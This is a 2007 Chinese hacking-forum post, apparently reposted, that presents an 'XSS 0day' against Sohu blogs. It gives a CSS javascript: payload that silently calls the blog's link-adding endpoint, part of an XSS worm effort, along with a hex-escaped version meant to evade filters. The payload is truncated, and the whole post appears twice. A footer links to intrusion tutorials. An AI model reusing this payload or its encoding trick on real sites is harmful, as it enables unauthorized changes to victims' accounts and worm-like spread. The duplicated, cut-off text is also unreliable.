XSS 0DAY代碼
更新時(shí)間:2007年03月08日 00:00:00 作者:
文章作者:茄子寶
信息來(lái)源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)
看到夢(mèng)之光芒放出來(lái)了!我也不藏了!
10月7日的時(shí)候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實(shí)很簡(jiǎn)單,就是兩次轉(zhuǎn)碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉(zhuǎn)碼參考 http://s0n9.blog.sohu.com/16002288.html
寫(xiě)成下面16進(jìn)制轉(zhuǎn)義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
信息來(lái)源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)
看到夢(mèng)之光芒放出來(lái)了!我也不藏了!
10月7日的時(shí)候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實(shí)很簡(jiǎn)單,就是兩次轉(zhuǎn)碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉(zhuǎn)碼參考 http://s0n9.blog.sohu.com/16002288.html
寫(xiě)成下面16進(jìn)制轉(zhuǎn)義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
相關(guān)文章
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程...2007-11-11
入侵ASP.net網(wǎng)站的經(jīng)驗(yàn)附利用代碼
愛(ài)好入侵的可以用下面的方法,做網(wǎng)站的朋友就需要了解下面的asp.net的利用代碼,最好來(lái)測(cè)試下2008-06-06
MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法
MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法...2007-10-10

